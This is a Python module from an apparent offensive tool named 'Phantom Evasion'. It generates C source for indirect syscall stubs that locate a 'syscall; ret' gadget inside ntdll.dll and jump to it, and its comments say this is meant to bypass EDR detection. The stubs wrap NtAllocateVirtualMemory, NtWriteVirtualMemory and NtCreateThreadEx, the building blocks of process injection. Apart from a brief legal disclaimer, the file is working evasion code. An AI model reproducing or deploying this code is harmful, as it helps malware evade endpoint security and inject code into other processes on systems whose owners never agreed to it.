"""
Phantom Evasion - Indirect Syscalls EDR Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_indirect_syscalls() -> Dict[str, Any]:
    """Generate indirect syscall stubs that jump to the ``syscall`` instruction
    inside ntdll.dll instead of emitting it directly.

    This bypasses EDRs that detect the ``syscall`` opcode (0F 05) in
    unexpected executable regions by ensuring the instruction executes
    within the legitimate ntdll.dll address space.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_INDIRECT_SYSCALLS_DEFINED__
#define __PHANTOM_INDIRECT_SYSCALLS_DEFINED__
// Indirect Syscalls – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// Locates the "syscall; ret" gadget inside ntdll.dll and jumps to it,
// ensuring the syscall instruction executes from within ntdll's .text section.

#include <windows.h>

// Inline winternl.h types for MinGW compatibility
#ifndef __PHANTOM_WINTERNL_DEFINED__
#define __PHANTOM_WINTERNL_DEFINED__
#ifndef _NTDEF_
typedef LONG NTSTATUS, *PNTSTATUS;
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID, *PCLIENT_ID;
#endif /* _NTDEF_ */
#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif
typedef struct _RTL_USER_PROCESS_PARAMETERS { BYTE Reserved1[16]; PVOID Reserved2[10]; UNICODE_STRING ImagePathName; UNICODE_STRING CommandLine; } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
typedef struct _PEB_LDR_DATA { ULONG Length; BOOL Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _PEB { BYTE Reserved1[2]; BYTE BeingDebugged; BYTE Reserved2[21]; PPEB_LDR_DATA Ldr; PRTL_USER_PROCESS_PARAMETERS ProcessParameters; BYTE Reserved3[520]; PVOID PostProcessInitRoutine; BYTE Reserved4[136]; ULONG SessionId; } PEB, *PPEB;
#endif /* __PHANTOM_WINTERNL_DEFINED__ */

// Populated by find_syscall_gadget()
static LPVOID g_syscall_gadget = NULL;

// Syscall service numbers – shared with direct_syscalls, populated at runtime
#ifndef __PHANTOM_SSN_VARS_DEFINED__
#define __PHANTOM_SSN_VARS_DEFINED__
static DWORD ssn_NtAllocateVirtualMemory = 0;
static DWORD ssn_NtWriteVirtualMemory    = 0;
static DWORD ssn_NtProtectVirtualMemory  = 0;
static DWORD ssn_NtCreateThreadEx        = 0;
#endif /* __PHANTOM_SSN_VARS_DEFINED__ */

/**
 * Scan ntdll.dll for the first "syscall; ret" byte sequence (0F 05 C3).
 * Returns pointer to the syscall instruction.
 */
static LPVOID find_syscall_gadget(void) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return NULL;

    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hNtdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((BYTE *)hNtdll + dos->e_lfanew);
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (memcmp(sec->Name, ".text", 5) == 0) {
            BYTE *start = (BYTE *)hNtdll + sec->VirtualAddress;
            BYTE *end   = start + sec->Misc.VirtualSize - 2;
            for (BYTE *p = start; p < end; p++) {
                if (p[0] == 0x0F && p[1] == 0x05 && p[2] == 0xC3)
                    return (LPVOID)p;
            }
        }
    }
    return NULL;
}

// ── Indirect NtAllocateVirtualMemory ────────────────────────────────────────
__attribute__((naked))
NTSTATUS IndirectNtAllocateVirtualMemory(
        HANDLE ProcessHandle, PVOID *BaseAddress,
        ULONG_PTR ZeroBits, PSIZE_T RegionSize,
        ULONG AllocationType, ULONG Protect) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "jmp %1\n\t"          // jump to ntdll syscall;ret gadget
        :
        : "m"(ssn_NtAllocateVirtualMemory), "m"(g_syscall_gadget)
        : "rax", "r10"
    );
}

// ── Indirect NtWriteVirtualMemory ───────────────────────────────────────────
__attribute__((naked))
NTSTATUS IndirectNtWriteVirtualMemory(
        HANDLE ProcessHandle, PVOID BaseAddress,
        PVOID Buffer, SIZE_T NumberOfBytesToWrite,
        PSIZE_T NumberOfBytesWritten) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "jmp %1\n\t"
        :
        : "m"(ssn_NtWriteVirtualMemory), "m"(g_syscall_gadget)
        : "rax", "r10"
    );
}

// ── Indirect NtCreateThreadEx ────────────────────────────────────────────────
__attribute__((naked))
NTSTATUS IndirectNtCreateThreadEx(
        PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess,
        POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle,
        PVOID StartRoutine, PVOID Argument,
        ULONG CreateFlags, SIZE_T ZeroBits,
        SIZE_T StackSize, SIZE_T MaximumStackSize,
        PVOID AttributeList) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "jmp %1\n\t"
        :
        : "m"(ssn_NtCreateThreadEx), "m"(g_syscall_gadget)
        : "rax", "r10"
    );
}

// Call this once before using indirect syscalls:
//   g_syscall_gadget = find_syscall_gadget();
#endif /* __PHANTOM_INDIRECT_SYSCALLS_DEFINED__ */
"""

    return {
        "code": code,
        "description": "Indirect syscall stubs that jump to ntdll.dll syscall;ret gadget",
        "layer": "Layer 2 - EDR Bypass",
        "name": "indirect_syscalls",
    }
